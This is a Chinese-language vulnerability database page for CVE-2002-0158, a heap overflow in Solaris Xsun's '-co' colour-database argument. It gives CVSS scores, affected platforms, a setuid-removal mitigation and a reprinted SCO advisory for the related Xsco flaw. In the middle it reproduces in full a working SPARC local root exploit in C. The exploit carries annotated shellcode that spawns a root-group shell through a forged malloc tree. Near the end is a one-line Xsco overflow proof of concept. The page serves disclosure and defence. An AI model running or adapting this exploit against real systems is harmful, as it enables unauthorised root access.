CVE-2002-0158
CVSS7.2
发布时间 :2002-04-02 00:00:00
修订时间 :2016-10-17 22:16:37
NMCOEPS    

[原文]Buffer overflow in Xsun on Solaris 2.6 through 8 allows local users to gain root privileges via a long -co (color database) command line argument.


[CNNVD]Solaris Xsun "-co"参数缓冲区溢出漏洞(CNNVD-200204-008)

        
        Xsun是Solaris平台上的Xwindow 服务器(for X11)。它被安装在/usr/openwin/bin/下。在SPARC平台下,它被设置了setgid root属性,在x86平台下,它被设置了setuid root属性。
        Xsun支持一个命令行参数:"-co",用来指定颜色数据库文件。由于没有对用户输入的文件名长度进行检查,攻击者可能引发一个堆溢出。小心地构造溢出数据,攻击者可以以root用户或者权限执行任意代码。
        如果攻击者为"-co"参数提供一个超长的参数(例如,超过6000字节长),就可能溢出一个动态分配的缓冲区,通过覆盖相邻的动态内存块边界数据结构,就可能利用malloc()/free()实现的一些特性来重写任意内存地址,例如保存的返回地址、函数指针等等。
        在SPARC平台下,攻击者可能获取root组权限。在x86平台下,攻击者可能获取root用户权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.6::sparc
cpe:/o:sun:solaris:8.0::sparc
cpe:/o:sun:solaris:7.0::sparc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:33Sun Solaris 7 XSun Color Database File Heap Overflow
oval:org.mitre.oval:def:14Sun Solaris 8 XSun Color Database File Heap Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0158
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0158
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200204-008
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0000.html
(VENDOR_ADVISORY)  VULNWATCH  20020402 NSFOCUS SA2002-01: Sun Solaris Xsun "-co" heap overflow
http://marc.info/?l=bugtraq&m=101776858410652&w=2
(UNKNOWN)  BUGTRAQ  20020402 NSFOCUS SA2002-01: Sun Solaris Xsun "-co" heap overflow
http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fpatches%2F108652
(UNKNOWN)  CONFIRM  http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fpatches%2F108652
http://www.securityfocus.com/bid/4408
(UNKNOWN)  BID  4408
http://xforce.iss.net/xforce/xfdb/8703
(UNKNOWN)  XF  solaris-xsun-co-bo(8703)

- 漏洞信息

Solaris Xsun "-co"参数缓冲区溢出漏洞
高危 边界条件错误
2002-04-02 00:00:00 2005-05-13 00:00:00
本地  
        
        Xsun是Solaris平台上的Xwindow 服务器(for X11)。它被安装在/usr/openwin/bin/下。在SPARC平台下,它被设置了setgid root属性,在x86平台下,它被设置了setuid root属性。
        Xsun支持一个命令行参数:"-co",用来指定颜色数据库文件。由于没有对用户输入的文件名长度进行检查,攻击者可能引发一个堆溢出。小心地构造溢出数据,攻击者可以以root用户或者权限执行任意代码。
        如果攻击者为"-co"参数提供一个超长的参数(例如,超过6000字节长),就可能溢出一个动态分配的缓冲区,通过覆盖相邻的动态内存块边界数据结构,就可能利用malloc()/free()实现的一些特性来重写任意内存地址,例如保存的返回地址、函数指针等等。
        在SPARC平台下,攻击者可能获取root组权限。在x86平台下,攻击者可能获取root用户权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉Xsun的suid root或sgid root属性:
        # chmod a-s /usr/openwin/bin/Xsun
        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sun.com

- 漏洞信息 (21360)

Sun Solaris 2.6/7.0/8 XSun Color Database File Heap Overflow Vulnerability (EDBID:21360)
solaris local
2002-04-02 Verified
0 gloomy
N/A [点击下载]
source: http://www.securityfocus.com/bid/4408/info

Solaris is the freely available Unix operating system distributed by Sun Microsystems.

It may be possible for a local user to gain elevated privileges. When Xsun is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges. 

/* Xsun(sparc) local exploit
   by gloomy (gloomy@root66.org) & eSDee (esdee@netric.org)
   ------------------------------------------------------------------
     Xsun is a Solaris server for X version 11. This program contains
   an option that is not really secure nowadays :).
   The option is used to determine the color database file. And yeah,
   indeed, you guessed it already, it contains a heap overflow.

     When we were busy writing this exploit within a multi display
   screen, we discovered some weird "unable-to-write-over-stackframe"
   problems. We tried everything to just write a few bytes over a
   saved program counter, but unfortunatly it was not possible on the
   current machine we were using. Then eSDee came up with something
   news. In the middle of the night a loud "yippeaaaaaa!" came out
   the bedroom of mister Es. He discovered a little section just
   below the GOT. It didn't contain \0 bytes and it was writeable.
   It's called the ti_jmp_table. I'm sure eSDee will write some
   papers about it soon.

     Gloomy was busy writing a shellcode that re-opens the STDIN. He
   found out that he just could open /dev/tty and then duplicate the
   STDERR filedescriptor, so the important descriptors were back
   again.

   USAGE:
        ./Xsun-expl [retloc] [ret]

   Example:
        bash$ gcc -o Xsun-expl Xsun-expl.c -Wall -Werror
        bash$ ./Xsun-expl
        Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....
        ...
        bash$ id
        uid=500(user) gid=0(root)

   Greets and kisses:
        #netric                 - www.netric.org
        #root66                 - www.root66.org
        mostlyharmless          - www.mostly-harmless.nl [soon]
        dB_____                 - fijne broer van gloom-ei! :)
        squezel                 - lekker ventje ben jij.

   More information available at: http://online.securityfocus.com/advisories/40
09

   [ps. wat een lompe text]
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define PATH            "/usr/openwin/bin/Xsun"
#define DISPLAY         ":1"
#define SIZE            5128

#define RET             0xffbef7bc
#define RETLOC          0xfecbea30      /* <ti_jmp_table+4> (a pointer to _retu
rn_zero) */
#define DUMMY           0xac1db0ef

struct WORD {
        long element;
        long dummy;
};

struct TREE {
        struct WORD    t_s;    /* size of this element */
        struct WORD    t_p;    /* parent node */
        struct WORD    t_l;    /* left child */
        struct WORD    t_r;    /* right child */
        struct WORD    t_n;    /* next in link list */
        struct WORD    t_d;    /* dummy to reserve space for self-pointer */
};

char
shellcode[]=

        /*
                setregid(0,0);                          setting root permission
s
                open("/dev/tty", RD_ONLY);              re-open STDIN
                dup(2);                                 duplicate STDOUT to STD
ERR
                execve("/bin//sh", &argv[0], NULL);     start the shell
                exit();                                 exit
        */

        "\x90\x1d\x80\x16"      // xor          %l6, %l6, %o0
        "\x92\x1d\x80\x16"      // xor          %l6, %l6, %o1
        "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
        "\x82\x10\x20\xcb"      // mov          0x2e, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [setreg
id(0,0)]

        "\x21\x0b\xd9\x19"      // sethi        %hi(0x2f646400), %l0
        "\xa0\x14\x21\x76"      // or           %l0, 0x176, %l0
        "\x23\x0b\xdd\x1d"      // sethi        %hi(0x2f747400), %l1
        "\xa2\x14\x60\x79"      // or           %l1, 0x79, %l1
        "\xe0\x3b\xbf\xf8"      // std          %l0, [ %sp - 0x8 ]
        "\x90\x23\xa0\x08"      // sub          %sp, 8, %o0
        "\x92\x1b\x80\x0e"      // xor          %sp, %sp, %o1
        "\x82\x10\x20\x05"      // mov          0x05, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [open("
/dev/tty",RD_ONLY)]

        "\x90\x10\x20\x02"      // mov          0x02, %o0
        "\x82\x10\x20\x29"      // mov          0x29, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [dup(2)
]

        "\x21\x0b\xd8\x9a"      // sethi        %hi(0x2f626800), %l0
        "\xa0\x14\x21\x6e"      // or           %l0, 0x16e, %l0
        "\x23\x0b\xcb\xdc"      // sethi        %hi(0x2f2f7000), %l1
        "\xa2\x14\x63\x68"      // or           %l1, 0x368, %l1
        "\xe0\x3b\xbf\xf0"      // std          %l0, [ %sp - 0x10 ]
        "\xc0\x23\xbf\xf8"      // clr          [ %sp - 0x8 ]
        "\x90\x23\xa0\x10"      // sub          %sp, 0x10, %o0
        "\xc0\x23\xbf\xec"      // clr          [ %sp - 0x14 ]
        "\xd0\x23\xbf\xe8"      // st           %o0, [ %sp - 0x18 ]
        "\x92\x23\xa0\x18"      // sub          %sp, 0x18, %o1
        "\x94\x22\x80\x0a"      // sub          %o2, %o2, %o2
        "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
        "\x82\x10\x20\x3b"      // mov          0x3b, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [execve
("/bin/sh","/bin/sh",NULL)]

        "\x82\x10\x20\x01"      // mov          0x01, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [exit(?
)]

        "\x10\xbf\xff\xdf"      // b            shellcode
        "\x90\x1d\x80\x16";     // or           %o1, %o1, %o1

int
main(int argc, char *argv[])
{
        struct TREE faketree;                           // our friendly little 
tree

        char buffer[SIZE+sizeof(faketree)+1];

        unsigned int ret          = RET;
        unsigned int retloc       = RETLOC;
        unsigned int dummy        = DUMMY;

        if (argc > 1) retloc    = strtoul(argv[1], &argv[1], 16);
        if (argc > 2) ret       = strtoul(argv[2], &argv[2], 16);

        faketree.t_s.element = 0xfffffff0;
        faketree.t_s.dummy   = dummy;
        faketree.t_n.element = retloc - 8;
        faketree.t_n.dummy   = dummy;
        faketree.t_l.element = 0xffffffff;
        faketree.t_l.dummy   = dummy;
        faketree.t_r.element = dummy;
        faketree.t_r.dummy   = dummy;
        faketree.t_p.element = ret;
        faketree.t_p.dummy   = dummy;
        faketree.t_d.element = dummy;
        faketree.t_d.dummy   = dummy;

        memset(buffer, 0x41, sizeof(buffer));
        memcpy(buffer + 3999 - (strlen(shellcode) - 8), shellcode, strlen(shell
code));
        memcpy(buffer + SIZE, &faketree, sizeof(faketree));
        buffer[SIZE + sizeof(faketree)] = 0x0;

        fprintf(stdout, "Retloc = 0x%08x\n"
                        "Ret    = 0x%08x\n",
                        retloc, ret);

        execl(PATH, "Xsun", "-co", buffer, DISPLAY, NULL);
        return 0;
}

/* [eof] */

		

- 漏洞信息 (F31839)

SCOX.txt (PacketStormID:F31839)
2003-10-16 00:00:00
 
advisory,local,vulnerability
CVE-2002-0158,CVE-2002-0164
[点击下载]

SCO Security Advisory - SCO OpenServer 5.0.5, 5.0.6, and 5.0.7 has had multiple vulnerabilities discovered in Xsco. One matches the command line parameter -co hole discovered in Xsun and another allows any local user with X access to gain read/write access to a shared memory segment.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.7 OpenServer 5.0.6 OpenServer 5.0.5 : Multiple security vulnerabilities in Xsco
Advisory number: 	CSSA-2003-SCO.26
Issue date: 		2003 October 10
Cross reference: 	sr862609 fz520528 erg712006 sr860995 fz520242 erg711972 CAN-2002-0158 CAN-2002-0164 
______________________________________________________________________________


1. Problem Description

	This supplement corrects two unrelated security problems in the
        SCO OpenServer "Xsco" X11 server.

        First,

	NSFOCUS Security Team has found a buffer overflow vulnerability
	in Xsun shipped with Solaris system when processing a
	command line parameter "-co", which could enable a local
	attacker to run arbitrary code with root user/root group
	privilege. 
	 
	Kevin Finisterre of Snosoft.com discovered that Xsco was also
	vulnerable. 
	 
	The Common Vulnerabilities and Exposures (CVE) project has assigned 
	the name CAN-2002-0158 to this issue. This is a candidate for 
	inclusion in the CVE list (http://cve.mitre.org), which standardizes 
	names for security problems. Candidates may change significantly
	before they become official CVE entries.

	Second,

	Roberto Zunino discovered a vulnerability in the MIT-SHM extension in
	all X servers that are running as root.

	Any user with local X access can exploit the MIT-SHM extension and gain
	read/write access to any shared memory segment on the system. 

	The Common Vulnerabilities and Exposures (CVE) project has assigned
        the name CAN-2002-0164 to this issue. This is a candidate for
        inclusion in the CVE list (http://cve.mitre.org), which standardizes
        names for security problems. Candidates may change significantly
        before they become official CVE entries.


2. Vulnerable Supported Versions

	System				Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.7 		/usr/bin/X11/Xsco
	OpenServer 5.0.6 		/usr/bin/X11/Xsco
	OpenServer 5.0.5 		/usr/bin/X11/Xsco


3. Solution

	The proper solution is to install the latest packages.


4. OpenServer 5.0.7, OpenServer 5.0.6, OpenServer 5.0.5

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.26


	4.2 Verification

	MD5 (VOL.000.000) = e7cbf7a8094ba43d44a6657a95673aeb
	MD5 (VOL.001.000) = 2eca28ac86436cec5fa7f059ab2fe850

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools


	4.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to the /tmp directory

	2) Run the custom command, specify an install from media
	images, and specify the /tmp directory as the location of
	the images.


5. References

	Specific references for this advisory:
		http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0158 
		http://marc.theaimsgroup.com/?l=bugtraq&m=101776858410652&w=2 
		http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0000.html
		http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0164
		http://marc.theaimsgroup.com/?l=bugtraq&m=103547625009363&w=2
		http://xforce.iss.net/xforce/xfdb/8706
		http://www.securityfocus.com/bid/4396
		http://www.linuxsecurity.com/advisories/caldera_advisory-2006.html
		ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.14/CSSA-2002-SCO.14.txt
	SCO security resources:

		http://www.sco.com/support/security/index.html

	This security fix closes SCO incidents sr862609 fz520528
	erg712006 sr860995 fz520242 erg711972


6. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.

7. Acknowledgments

	SCO would like to thank the NSFOCUS Security Team for finding
        the "-co" vulnerability, and Kevin Finisterre of Snosoft.com for
        confirming its applicability to Xsco.  SCO would also like to
        thank Roberto Zunino for discovering the MIT-SHM vulnerability.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (SCO/UNIX_SVR5)

iD8DBQE/jfZSaqoBO7ipriERAjSbAJkBWpJMSXcQwLFnTTRgVa5vaEXGEgCfeSKa
yS0vg5xrMpoBo3zWeqgpsNQ=
=Abuh
-----END PGP SIGNATURE-----

----- End forwarded message -----
    

- 漏洞信息

8703
Solaris Xsun -co Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-04-02 Unknow
2002-04-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Caldera OpenServer XSCO Color Database File Heap Overflow Vulnerability
Boundary Condition Error 4985
No Yes
2002-06-11 12:00:00 2009-07-11 01:56:00
Vulnerability discovery credited to KF <dotslash@snosoft.com>.

- 受影响的程序版本

SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0

- 漏洞讨论

OpenServer is commercial Unix operating system originally developed by SCO, and distributed by Caldera.

It may be possible for a local user to gain elevated privileges. When Xsco is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges.

- 漏洞利用

The following proof of concept has been made available:

./Xsco :1 -co `perl -e 'print "A" x 9000'`

- 解决方案

SCO has released advisory CSSA-2003-SCO.26 to address this issue.


SCO Open Server 5.0

SCO Open Server 5.0.1

SCO Open Server 5.0.2

SCO Open Server 5.0.3

SCO Open Server 5.0.4

SCO Open Server 5.0.5

SCO Open Server 5.0.6

SCO Open Server 5.0.7

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站